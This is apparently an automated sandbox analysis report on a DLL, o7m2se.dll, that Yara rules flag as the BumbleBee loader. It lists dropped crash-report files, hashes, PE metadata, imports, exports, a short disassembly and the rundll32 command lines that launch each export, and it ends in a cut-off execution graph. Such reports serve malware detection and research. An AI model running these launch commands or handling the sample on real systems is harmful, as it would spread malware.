              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8490
              Entropy (8bit):3.6942421202436893
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.451591473114414
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.455274796743089
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:55:35 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56518
              Entropy (8bit):1.664675283576867
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8486
              Entropy (8bit):3.6942260817002595
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.458953593114226
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:56:13 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56910
              Entropy (8bit):1.7162249941239178
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:56:15 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56914
              Entropy (8bit):1.6832665332999834
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:56:14 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):58426
              Entropy (8bit):1.6547530682830196
              Encrypted:false
              SSDEEP:192:SXwq+8VXOC5cndTyT3rjxcow+sqs7V2ME6kwGWeKEMmPbXz3cud:kKC2NyoQ6kwGfs
              MD5:AA8CDF5205F8318626752C678A83C2B9
              SHA1:7C0A13E0E9F37EB7262CD50A00FE9509B4DAF71A
              SHA-256:02BB724526850D91EB7E7874EFD01323A708ADE7EF8C0DA9B9090720A996BE67
              SHA-512:29C76E01037E9CA07FCB2B9775FB2A922CCA9A558A4955FC82FC38C3AAF78C20EDCCC7353CA6CA41B4CC0A92F85F326FA86A85600A6768BD27CCF2609E962B40
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8686
              Entropy (8bit):3.6984238938177976
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNi4LrNT6Y1fqUgmfv3SwAxCprO89bljsKf63m:RrlsNiErNT6YNRgmfv3SwLlIKfj
              MD5:E447CAD0A62DE837758793B5888A58F3
              SHA1:B27342028B61A2F86BF53078E81DD253B1A0BB73
              SHA-256:E441DB120E5700E068B68AA438698AABF5D695A854CC3DDEED747078F4F24ADB
              SHA-512:7AA174CF00FBAF1B99A1AE4474ACC334F0E04EF6F745A2C31489829FB942E8779236AD7CC1F662404B0CF8110925D206EBEC44F4417537458CC6AD3B50612D55
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>17134</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString><Revision>1</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>1033</LCID></OSVersionInformation><ProcessInformation><Pid>7064</Pid>
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8488
              Entropy (8bit):3.6935898208327784
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNi/tUNw6Y1UqUgmfv/OS7axCprm89bOVsafCam:RrlsNi1UNw6YmRgmfvWS5Ouaf2
              MD5:79D6936AA3EEFDA67E90578ACF5D34A2
              SHA1:383ECEB5937387731911B4198A4F639D32BEB1BC
              SHA-256:5D9DA4BDD3155C1946F6DD41176F04C3251E4236BB8FC4348852409D3D7F33B0
              SHA-512:D81446C6461D3567607B68D9B86ABC93A01DBBC5A1C2C953F23B1B53DDE39B08A022FF95DFF31126C3D8809916B6768CE3A25255307B3225455279442A0F898D
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>17134</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString><Revision>1</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>1033</LCID></OSVersionInformation><ProcessInformation><Pid>7072</Pid>
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8486
              Entropy (8bit):3.693020365748347
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNiHnQ9Nh6Y1cqUgmfvvSwTxCprb89bOJBfxam:RrlsNiw9Nh6YuRgmfvvSwJOvft
              MD5:F54C7F49DE79B7A17D94B0565F9D9709
              SHA1:7BC736EB7F6AB3A7E79A07CD39A4E34B2D116663
              SHA-256:13E19271898F19BAD81006D2BB8713DFC5EFCAE588572FD2EAFC3499C06EB0A4
              SHA-512:08E5C6E675C38B55CA02EAFF6616FE6F9AEC8FBE1AA19F8E8080771CE416E4E07237D368CAF923898A17CBE40E3A8D2E8DFB8D21003F2C91F2D3CAE32D9A0409
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?><WERReportMetadata><OSVersionInformation><WindowsNTVersion>10.0</WindowsNTVersion><Build>17134</Build><Product>(0x30): Windows 10 Pro</Product><Edition>Professional</Edition><BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString><Revision>1</Revision><Flavor>Multiprocessor Free</Flavor><Architecture>X64</Architecture><LCID>1033</LCID></OSVersionInformation><ProcessInformation><Pid>7140</Pid>
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.45394533303562
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjv8fm8M4JCYCr1yFwyq85mQEDZESC5SDd:uITfFR7QgrsqYIJ6TVvDd
              MD5:4294A174CF58F3D1992B9DCED2744BCA
              SHA1:E5CCCBEE658C64468031C40E1852A5E18406F4DD
              SHA-256:DC4CF98197980A90F677B08BD94D759153BB85EAEC38E710E01E458CFA65FBE8
              SHA-512:0F79BF3120EC1D7F2CF111824E568E8337114D2265B4BA0C6D2F2A8AEEC46406E66EBDAF016F2DAEF7EAA5CE1CEDA0198F3DDFE6697A29CD78EEE9FC65B9E930
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.45593096357786
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjC8fm8M4JCYCrNFcyq85mQFiZESC5S4d:uITfFR7QgrsqYLJfqiVv4d
              MD5:4B5E6C0DB407F321B15D4855989F3468
              SHA1:E7CC31D9F76A92409F5F6D6B6AA9C2C900D490FB
              SHA-256:940B51633D4CA5EA7418C9C8E62B1A627549C08E4C78699483FE078AC85D8834
              SHA-512:3BF75CA97CEEBF3E59472E0EB1A5526C3AC81367D7E71A8A95BA577EBE6172DFB44E07868B3210AD9302C338BE4C227D9C2997932E87D5CC946D3D34395E90D5
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.457626084216517
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjw8fm8M4JCYCr18F3yq85mQE/ZESC5Syd:uITfFR7QgrsqY5JjPVvyd
              MD5:033260C88C7E418E8EAB858F344040AA
              SHA1:95668E1640481D060C68052E172A5F84DC1A1D1E
              SHA-256:6ACD6342E1390FA9F6B5D54F6082E05636B8E2A1A922E697D1CACE210F647B14
              SHA-512:3F1FB74BA03EB5A911033F736FB3CC8493AEA0EDA4DDE85E92B1DD4DEBAC98268F7E70F3250C385FCCA02B3048054FB22B981D961EB2D4E04A44044D31FC1BFE
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1594086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Entropy (8bit):6.249251858982643
              TrID:
              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
              • Win64 Executable (generic) (12005/4) 10.17%
              • Generic Win/DOS Executable (2004/3) 1.70%
              • DOS Executable Generic (2002/1) 1.70%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
              File name:o7m2se.dll
              File size:1530368
              MD5:cc9f20deaa66ffd5b96b727c2454e141
              SHA1:3b90678ff567417851e8c9953effeda2969abc4d
              SHA256:e6c6ad0411501c2d81863c0ecaf80ace8a5e9b6ce8329c5700890eb36991f6fb
              SHA512:55ba6429ba465b818714ac8a49fef427449788040b5b1156f562a2efec11185dbe3609859384044428bcad343a841420417a38e8387b0162f1d644edaa69004f
              SSDEEP:24576:VsxwIV3HSw5TaUMa1W8EvggEvioIqaKWZlP5xJNm9UomzbmhlgyCJ/5VUXb:VsxwIV3HSiTaUY8E4l67qKZfnNjzqjgq
              TLSH:FF65E05DCF2F8199DD13B4F1BEA3D2D24DA9B1449A5849B3172D19180E9303CE8DF2BA
              Icon Hash:74f0e4ecccdce0e4
              Entrypoint:0x18000320c
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x180000000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE
              Time Stamp:0x62C44638 [Tue Jul 5 14:10:00 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:f4a46a3d99fc0c7291a7b32c7cfb6621
              Instruction
              dec eax
              mov dword ptr [esp+08h], ebx
              dec eax
              mov dword ptr [esp+10h], esi
              push edi
              dec eax
              sub esp, 20h
              dec ecx
              mov edi, eax
              mov ebx, edx
              dec eax
              mov esi, ecx
              cmp edx, 01h
              jne 00007F2CD0B71AF7h
              call 00007F2CD0B71EF0h
              dec esp
              mov eax, edi
              mov edx, ebx
              dec eax
              mov ecx, esi
              dec eax
              mov ebx, dword ptr [esp+30h]
              dec eax
              mov esi, dword ptr [esp+38h]
              dec eax
              add esp, 20h
              pop edi
              jmp 00007F2CD0B7196Ch
              int3
              int3
              int3
              dec eax
              sub esp, 28h
              call 00007F2CD0B72384h
              test eax, eax
              je 00007F2CD0B71B13h
              dec eax
              mov eax, dword ptr [00000030h]
              dec eax
              mov ecx, dword ptr [eax+08h]
              jmp 00007F2CD0B71AF7h
              dec eax
              cmp ecx, eax
              je 00007F2CD0B71B06h
              xor eax, eax
              dec eax
              cmpxchg dword ptr [00171858h], ecx
              jne 00007F2CD0B71AE0h
              xor al, al
              dec eax
              add esp, 28h
              ret
              mov al, 01h
              jmp 00007F2CD0B71AE9h
              int3
              int3
              int3
              dec eax
              sub esp, 28h
              call 00007F2CD0B72348h
              test eax, eax
              je 00007F2CD0B71AF9h
              call 00007F2CD0B7216Fh
              jmp 00007F2CD0B71B0Bh
              call 00007F2CD0B72330h
              mov ecx, eax
              call 00007F2CD0B75B9Dh
              test eax, eax
              je 00007F2CD0B71AF6h
              xor al, al
              jmp 00007F2CD0B71AF9h
              call 00007F2CD0B76048h
              mov al, 01h
              dec eax
              add esp, 28h
              ret
              dec eax
              sub esp, 28h
              xor ecx, ecx
              call 00007F2CD0B71C36h
              test al, al
              setne al
              dec eax
              add esp, 28h
              ret
              int3
              int3
              Programming Language:
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215
              Name                                  Virtual Address  Virtual Size  Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT          0x9b470          0x84          .rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT          0x9b4f4          0x28          .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x179000         0x1e0         .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x176000         0x1284        .pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x17a000         0x684         .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG           0x99eb0          0x1c          .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x99ed0          0x94          .rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_IAT             0x1c000          0x278         .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
              .text   0x1000           0x1aad0       0x1ac00   False     0.5841121495327103  zlib compressed data  6.441601663734701   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata  0x1c000          0x7fd76       0x7fe00   False     0.7084097018572825  data                  6.1148825014907375  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data   0x9c000          0xd9d48       0xd8c00   False     0.5490117232554786  data                  4.556367903742222   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .pdata  0x176000         0x1284        0x1400    False     0.465234375         data                  4.91486170750951    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .gfids  0x178000         0x98          0x200     False     0.248046875         data                  1.3418312792758706  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc   0x179000         0x1e0         0x200     False     0.53125             data                  4.724728911998389   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc  0x17a000         0x684         0x800     False     0.55810546875       data                  4.962526665636307   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name         RVA       Size   Type                   Language  Country
              RT_MANIFEST  0x179060  0x17d  XML 1.0 document text  English   United States
              DLL           Import
              KERNEL32.dll  CreateFileA, FindFirstFileA, FindNextFileA, SetFileAttributesA, CloseHandle, GetLastError, ConnectNamedPipe, DisconnectNamedPipe, HeapAlloc, GetProcessHeap, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, ExitProcess, GetCurrentThreadId, GetModuleFileNameA, CreateNamedPipeA, WaitNamedPipeA, GetCurrentActCtx, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, SetLastError, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapFree, GetStdHandle, GetFileType, GetStringTypeW, GetACP, GetTimeZoneInformation, RaiseException, CompareStringW, LCMapStringW, FindClose, FindFirstFileExA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetStdHandle, HeapSize, HeapReAlloc, WriteFile, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
              Name        Ordinal  Address
              KInMQF      1        0x180018c00
              KwNqBn2l9N  2        0x180015694
              LLBMPMUsqf  4        0x18001af20
              SrNF6Da     3        0x1800184f0
              Language of compilation system:English
              Country where language is spoken:United States
              No network behavior found


              Target ID:0
              Start time:07:55:28
              Start date:08/07/2022
              Path:C:\Windows\System32\loaddll64.exe
              Wow64 process (32bit):false
              Commandline:loaddll64.exe "C:\Users\user\Desktop\o7m2se.dll"
              Imagebase:0x7ff66b7a0000
              File size:140288 bytes
              MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:1
              Start time:07:55:28
              Start date:08/07/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Imagebase:0x7ff602050000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:07:55:29
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQF
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:07:55:29
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:8
              Start time:07:55:31
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 6560 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:9
              Start time:07:55:31
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 6572 -s 324
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:10
              Start time:07:55:32
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KwNqBn2l9N
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:12
              Start time:07:55:34
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 6796 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:14
              Start time:07:55:36
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\o7m2se.dll,LLBMPMUsqf
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:16
              Start time:07:55:39
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KInMQF
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:17
              Start time:07:55:40
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KwNqBn2l9N
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:19
              Start time:07:55:40
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",LLBMPMUsqf
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security

              Target ID:21
              Start time:07:55:41
              Start date:08/07/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",SrNF6Da
              Imagebase:0x7ff7dd5d0000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:23
              Start time:07:55:50
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7064 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:24
              Start time:07:55:50
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:25
              Start time:07:55:51
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:27
              Start time:07:56:09
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:29
              Start time:07:56:11
              Start date:08/07/2022
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
              Imagebase:0x7ff76a840000
              File size:494488 bytes
              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language


                Execution Graph

                Execution Coverage:2.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:11.9%
                Total number of Nodes:1428
                Total number of Limit Nodes:10
7ffa535e6c30 8141 7ffa535e6c50 8140->8141 8144 7ffa535e6478 8141->8144 8145 7ffa535e64a8 8144->8145 8146 7ffa535e64ce 8144->8146 8148 7ffa535e8380 _get_daylight 15 API calls 8145->8148 8146->8145 8147 7ffa535e64dc 8146->8147 8149 7ffa535e4ae8 36 API calls 8147->8149 8150 7ffa535e64ad 8148->8150 8153 7ffa535e64e9 8149->8153 8151 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8150->8151 8164 7ffa535e64b8 8151->8164 8154 7ffa535e6523 8153->8154 8165 7ffa535e8604 8153->8165 8155 7ffa535e8380 _get_daylight 15 API calls 8154->8155 8156 7ffa535e683a 8154->8156 8158 7ffa535e687e 8155->8158 8157 7ffa535e8380 _get_daylight 15 API calls 8156->8157 8160 7ffa535e6b2a 8156->8160 8159 7ffa535e6b1f 8157->8159 8161 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8158->8161 8162 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8159->8162 8163 7ffa535e8380 _get_daylight 15 API calls 8160->8163 8160->8164 8161->8156 8162->8160 8163->8164 8166 7ffa535e861f 8165->8166 8168 7ffa535e861b 8165->8168 8167 7ffa535e8639 GetStringTypeW 8166->8167 8166->8168 8167->8168 8168->8153 8169 7ffa535eab2c 8170 7ffa535eab59 __scrt_fastfail 8169->8170 8171 7ffa535eab41 8169->8171 8170->8171 8175 7ffa535eab6e 8170->8175 8172 7ffa535e8380 _get_daylight 15 API calls 8171->8172 8173 7ffa535eab46 8172->8173 8174 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8173->8174 8177 7ffa535eab52 8174->8177 8176 7ffa535e8380 _get_daylight 15 API calls 8175->8176 8175->8177 8176->8177 8553 